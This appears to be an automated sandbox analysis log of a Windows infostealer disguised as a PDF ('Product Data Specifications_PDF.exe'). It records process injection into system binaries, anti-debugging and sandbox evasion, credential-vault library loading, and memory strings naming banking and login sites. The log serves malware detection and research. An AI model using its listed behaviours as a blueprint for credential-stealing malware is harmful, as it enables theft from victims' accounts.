Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode, 6_2_0045D619
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle, 6_2_004755C4
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_0046CB5F OleInitialize,CLSIDFromProgID,CLSIDFromString,CoCreateInstance,CoInitializeSecurity,_wcslen,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket, 6_2_0046CB5F
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx, 6_2_0043305F
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe File created: C:\Users\user~1\AppData\Local\Temp\nonhazardousness Jump to behavior
Source: Product Data Specifications_PDF.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: cmdl32.exe, 0000000C.00000003.1973204576.0000000003208000.00000004.00000020.00020000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3155201371.0000000003228000.00000004.00000020.00020000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3155201371.00000000031F3000.00000004.00000020.00020000.00000000.sdmp, cmdl32.exe, 0000000C.00000003.1973278048.00000000031F3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Product Data Specifications_PDF.exe ReversingLabs: Detection: 55%
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe File read: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Product Data Specifications_PDF.exe "C:\Users\user\Desktop\Product Data Specifications_PDF.exe"
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Product Data Specifications_PDF.exe"
Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe Process created: C:\Windows\SysWOW64\cmdl32.exe "C:\Windows\SysWOW64\cmdl32.exe"
Source: C:\Windows\SysWOW64\cmdl32.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Product Data Specifications_PDF.exe" Jump to behavior
Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe Process created: C:\Windows\SysWOW64\cmdl32.exe "C:\Windows\SysWOW64\cmdl32.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmdl32.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Section loaded: msdart.dll Jump to behavior
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmdl32.exe Section loaded: cmpbk32.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmdl32.exe Section loaded: cmutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmdl32.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmdl32.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmdl32.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmdl32.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmdl32.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmdl32.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmdl32.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmdl32.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmdl32.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmdl32.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmdl32.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmdl32.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmdl32.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmdl32.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmdl32.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmdl32.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmdl32.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmdl32.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmdl32.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmdl32.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmdl32.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmdl32.exe Section loaded: winsqlite3.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmdl32.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmdl32.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmdl32.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmdl32.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 Jump to behavior
Source: C:\Windows\SysWOW64\cmdl32.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: Product Data Specifications_PDF.exe Static file information: File size 1335877 > 1048576
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: EyHLOQmzGKBL.exe, 0000000B.00000002.3150184532.0000000000C2E000.00000002.00000001.01000000.00000005.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3158489815.0000000000C2E000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: cmdl32.pdbGCTL source: svchost.exe, 00000009.00000003.1733070057.0000000003025000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1733005926.000000000301B000.00000004.00000020.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000B.00000002.3155445381.0000000001368000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: Product Data Specifications_PDF.exe, 00000006.00000003.1378207323.00000000047E0000.00000004.00001000.00020000.00000000.sdmp, Product Data Specifications_PDF.exe, 00000006.00000003.1378088013.0000000004640000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1668357541.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1764371082.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1666529619.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1764371082.000000000379E000.00000040.00001000.00020000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3158930427.0000000004DC0000.00000040.00001000.00020000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3158930427.0000000004F5E000.00000040.00001000.00020000.00000000.sdmp, cmdl32.exe, 0000000C.00000003.1783633170.0000000004C14000.00000004.00000020.00020000.00000000.sdmp, cmdl32.exe, 0000000C.00000003.1781322079.0000000004A6B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: cmdl32.pdb source: svchost.exe, 00000009.00000003.1733070057.0000000003025000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1733005926.000000000301B000.00000004.00000020.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000B.00000002.3155445381.0000000001368000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: Product Data Specifications_PDF.exe, 00000006.00000003.1378207323.00000000047E0000.00000004.00001000.00020000.00000000.sdmp, Product Data Specifications_PDF.exe, 00000006.00000003.1378088013.0000000004640000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000009.00000003.1668357541.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1764371082.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1666529619.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1764371082.000000000379E000.00000040.00001000.00020000.00000000.sdmp, cmdl32.exe, cmdl32.exe, 0000000C.00000002.3158930427.0000000004DC0000.00000040.00001000.00020000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3158930427.0000000004F5E000.00000040.00001000.00020000.00000000.sdmp, cmdl32.exe, 0000000C.00000003.1783633170.0000000004C14000.00000004.00000020.00020000.00000000.sdmp, cmdl32.exe, 0000000C.00000003.1781322079.0000000004A6B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdb source: cmdl32.exe, 0000000C.00000002.3159746980.00000000053EC000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3155201371.0000000003178000.00000004.00000020.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000279C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.2081521933.0000000020B1C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP source: cmdl32.exe, 0000000C.00000002.3159746980.00000000053EC000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3155201371.0000000003178000.00000004.00000020.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000279C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.2081521933.0000000020B1C000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_0040EBD0 LoadLibraryA,GetProcAddress, 6_2_0040EBD0
Source: Product Data Specifications_PDF.exe Static PE information: real checksum: 0xa961f should be: 0x151e8c
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_00416CB5 push ecx; ret 6_2_00416CC8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_004180C9 push ds; retf 9_2_004180ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00414177 push ds; iretd 9_2_0041417A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00403100 push eax; ret 9_2_00403102
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_004181E3 push 00000012h; iretd 9_2_004181B2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_004181B0 push 00000012h; iretd 9_2_004181B2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0040828D push ebp; retf 9_2_004082AE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0040D2BC push edi; ret 9_2_0040D2BD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0041EB64 push ecx; ret 9_2_0041EB78
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00406B35 push FFFFFFBFh; ret 9_2_00406B37
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_004083B5 push edx; ret 9_2_004083D1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0040D43C push ds; retf 9_2_0040D43D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00414CFF pushfd ; ret 9_2_00414D00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0040D5EF push dword ptr [eax]; ret 9_2_0040D5F8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00416753 push edi; retf 9_2_0041675E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00416752 push edi; retf 9_2_0041675E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00417FD0 push ds; retf 9_2_004180ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036309AD push ecx; mov dword ptr [esp], ecx 9_2_036309B6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0360135F push eax; iretd 9_2_03601369
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04DC27FA pushad ; ret 12_2_04DC27F9
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04DC225F pushad ; ret 12_2_04DC27F9
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04DC283D push eax; iretd 12_2_04DC2858
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04DF09AD push ecx; mov dword ptr [esp], ecx 12_2_04DF09B6
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_02BB0A56 push E65B4B16h; iretd 12_2_02BB0A5B
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_02BA4ECF push ds; retf 12_2_02BA4FEA
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_02BA4FC6 push ds; retf 12_2_02BA4FEA
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_02B952B2 push edx; ret 12_2_02B952CE
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_02BA50AD push 00000012h; iretd 12_2_02BA50AF
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_02BA50E0 push 00000012h; iretd 12_2_02BA50AF
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_02BA1074 push ds; iretd 12_2_02BA1077
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_02B9518A push ebp; retf 12_2_02B951AB
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 6_2_0047A330
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput, 6_2_00434418
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmdl32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmdl32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmdl32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmdl32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmdl32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe API/Special instruction interceptor: Address: 4005AF4
Source: C:\Windows\SysWOW64\cmdl32.exe API/Special instruction interceptor: Address: 7FFB2CECD324
Source: C:\Windows\SysWOW64\cmdl32.exe API/Special instruction interceptor: Address: 7FFB2CECD7E4
Source: C:\Windows\SysWOW64\cmdl32.exe API/Special instruction interceptor: Address: 7FFB2CECD944
Source: C:\Windows\SysWOW64\cmdl32.exe API/Special instruction interceptor: Address: 7FFB2CECD504
Source: C:\Windows\SysWOW64\cmdl32.exe API/Special instruction interceptor: Address: 7FFB2CECD544
Source: C:\Windows\SysWOW64\cmdl32.exe API/Special instruction interceptor: Address: 7FFB2CECD1E4
Source: C:\Windows\SysWOW64\cmdl32.exe API/Special instruction interceptor: Address: 7FFB2CED0154
Source: C:\Windows\SysWOW64\cmdl32.exe API/Special instruction interceptor: Address: 7FFB2CECDA44
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0367096E rdtsc 9_2_0367096E
Source: C:\Windows\SysWOW64\cmdl32.exe Window / User API: threadDelayed 2055 Jump to behavior
Source: C:\Windows\SysWOW64\cmdl32.exe Window / User API: threadDelayed 7918 Jump to behavior
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe API coverage: 3.7 %
Source: C:\Windows\SysWOW64\svchost.exe API coverage: 0.7 %
Source: C:\Windows\SysWOW64\cmdl32.exe API coverage: 2.6 %
Source: C:\Windows\SysWOW64\cmdl32.exe TID: 7596 Thread sleep count: 2055 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\cmdl32.exe TID: 7596 Thread sleep time: -4110000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\cmdl32.exe TID: 7596 Thread sleep count: 7918 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\cmdl32.exe TID: 7596 Thread sleep time: -15836000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe TID: 7644 Thread sleep time: -45000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\cmdl32.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmdl32.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose, 6_2_00452492
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 6_2_00442886
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 6_2_004788BD
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose, 6_2_004339B6
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose, 6_2_0045CAFA
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 6_2_00431A86
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose, 6_2_0044BD27
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_0045DE8F FindFirstFileW,FindClose, 6_2_0045DE8F
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose, 6_2_0044BF8B
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_02BAC980 FindFirstFileW,FindNextFileW,FindClose, 12_2_02BAC980
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary, 6_2_0040E500
Source: cmdl32.exe, 0000000C.00000002.3161379449.0000000008115000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CDYNVMware20,11696492231p
Source: cmdl32.exe, 0000000C.00000002.3161379449.0000000008115000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20
Source: 635gG211.12.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: 635gG211.12.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: cmdl32.exe, 0000000C.00000002.3161379449.0000000008115000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,1169649
Source: 635gG211.12.dr Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: 635gG211.12.dr Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: 635gG211.12.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: cmdl32.exe, 0000000C.00000002.3161379449.0000000008115000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: nge Transaction PasswordVMware20,11696492231^
Source: 635gG211.12.dr Binary or memory string: outlook.office.comVMware20,11696492231s
Source: cmdl32.exe, 0000000C.00000002.3161379449.0000000008115000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,116C
Source: 635gG211.12.dr Binary or memory string: AMC password management pageVMware20,11696492231
Source: 635gG211.12.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: EyHLOQmzGKBL.exe, 0000000D.00000002.3157755641.00000000008EF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllS
Source: 635gG211.12.dr Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: 635gG211.12.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: cmdl32.exe, 0000000C.00000002.3161379449.0000000008115000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,116
Source: cmdl32.exe, 0000000C.00000002.3161379449.0000000008115000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: zure.comVMware20,11696492231j
Source: 635gG211.12.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: 635gG211.12.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: 635gG211.12.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: 635gG211.12.dr Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: 635gG211.12.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: 635gG211.12.dr Binary or memory string: discord.comVMware20,11696492231f
Source: cmdl32.exe, 0000000C.00000002.3155201371.0000000003178000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000011.00000002.2088257723.00000193E0A4E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 635gG211.12.dr Binary or memory string: global block list test formVMware20,11696492231
Source: 635gG211.12.dr Binary or memory string: dev.azure.comVMware20,11696492231j
Source: 635gG211.12.dr Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: 635gG211.12.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: 635gG211.12.dr Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: 635gG211.12.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: cmdl32.exe, 0000000C.00000002.3161379449.0000000008115000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696492231[
Source: 635gG211.12.dr Binary or memory string: tasks.office.comVMware20,11696492231o
Source: cmdl32.exe, 0000000C.00000002.3161379449.0000000008115000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Transaction PasswordVMware20,11696492231}
Source: 635gG211.12.dr Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: 635gG211.12.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: cmdl32.exe, 0000000C.00000002.3161379449.0000000008115000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: blocklistVMware20,11696492231
Source: cmdl32.exe, 0000000C.00000002.3161379449.0000000008115000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware
Source: 635gG211.12.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: 635gG211.12.dr Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: 635gG211.12.dr Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: 635gG211.12.dr Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
Source: 635gG211.12.dr Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: 635gG211.12.dr Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\cmdl32.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0367096E rdtsc 9_2_0367096E
